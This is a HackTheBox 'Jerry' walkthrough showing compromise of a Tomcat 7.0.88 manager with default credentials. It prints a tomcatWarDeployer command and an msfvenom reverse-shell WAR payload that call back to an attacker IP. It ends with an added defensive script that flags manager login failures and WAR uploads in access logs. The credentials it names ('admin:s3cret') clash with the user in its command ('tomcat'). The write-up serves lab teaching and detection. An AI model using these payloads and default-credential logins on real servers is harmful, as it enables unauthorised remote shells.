HTB Walkthrough : Jerry

Today we are going to solve another HackTheBox machine, “Jerry”, created by mrh4sh. The lab mainly focuses on exploitation of a Tomcat server.

Level : Easy

Attacking Strategy

  • Network scanning
    • Nmap
  • Recon
    • Tomcat enumeration
  • Exploitation
    • tomcat 7.0.88 exploit
    • Virtual Environment setup
  • Privilege Escalation
  • Manual Exploitation

Walkthrough

IP address : 10.129.1.110

We start our journey by running an Nmap scan against the machine to enumerate its open ports and services.

Enumeration

nmap -sC -sV -p- 10.129.1.110 -Pn 

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST
Nmap scan report for 10.129.1.110
Host is up (0.16s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Nmap shows that port 8080 is open with Apache Tomcat running on it, and the page title also gives the version, 7.0.88, which is exploitable. After some googling we land on an exploit, which you can get from GitHub.

Exploitation

After reading the exploit and understanding its flow, we set up a virtual environment so that we can install the dependencies needed to run it.

git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer
virtualenv -p python2 venv
source venv/bin/activate
pip install -r requirements.txt

Once everything is set, we also need credentials for the Tomcat server. After some googling we land on a GitHub page that lists default credentials, and after trying a few of them we find a working pair: “admin:s3cret”. After a successful exploit we get an administrative shell and collect the flags.

python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Manual Exploit

You can also exploit the server without the tomcatWarDeployer script. For this we need to create a Metasploit payload and upload it to the Tomcat server.

Once logged in to the account, simply go to the WAR file upload section, upload the payload file and deploy it.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war

Once the payload is successfully uploaded, we call it using curl and get a session.
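
From the defender's side, both the credential guessing and the WAR upload described above leave traces in Tomcat's access log. The following check is an added example, not part of the original walkthrough or of any tool it uses; it assumes the default access-log pattern, and the function name, threshold and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in Tomcat's default access-log pattern (%h %l %u %t "%r" %s %b).
# Addresses, user names and sizes are made up for this example.
SAMPLE_LOG = """\
192.0.2.10 - - [15/May/2021:18:40:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [15/May/2021:18:40:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [15/May/2021:18:40:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - tomcat [15/May/2021:18:40:04 +0000] "GET /manager/html HTTP/1.1" 200 17612
192.0.2.10 - tomcat [15/May/2021:18:41:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19840
198.51.100.7 - - [15/May/2021:18:42:00 +0000] "GET /docs/ HTTP/1.1" 200 19367
198.51.100.7 - deployer [15/May/2021:18:43:00 +0000] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 60
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')
# Manager endpoints that accept a WAR: HTML upload form and text-interface deploy.
DEPLOY = re.compile(r'^/manager/(?:html/upload|text/deploy)\b')

def find_manager_abuse(log_text, fail_threshold=3):
    """Return (kind, client, user) alerts for /manager activity in an access log."""
    failures = defaultdict(int)  # client -> 401s on /manager since last success
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected pattern
        client, user, method, path, status = m.groups()
        if not path.startswith("/manager/"):
            continue
        if status == "401":
            failures[client] += 1
            continue
        if status.startswith("2") and user != "-":
            # A browser's first request always gets one 401 challenge, so only
            # a run of failures before the success suggests password guessing.
            if failures[client] >= fail_threshold:
                alerts.append(("login-after-failures", client, user))
            failures[client] = 0
            if method in ("POST", "PUT") and DEPLOY.match(path):
                alerts.append(("war-deploy", client, user))
    return alerts

if __name__ == "__main__":
    for alert in find_manager_abuse(SAMPLE_LOG):
        print(alert)
```

A WAR deployment from an address outside the administrators' network is worth alerting on by itself, whether or not failed logins preceded it.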
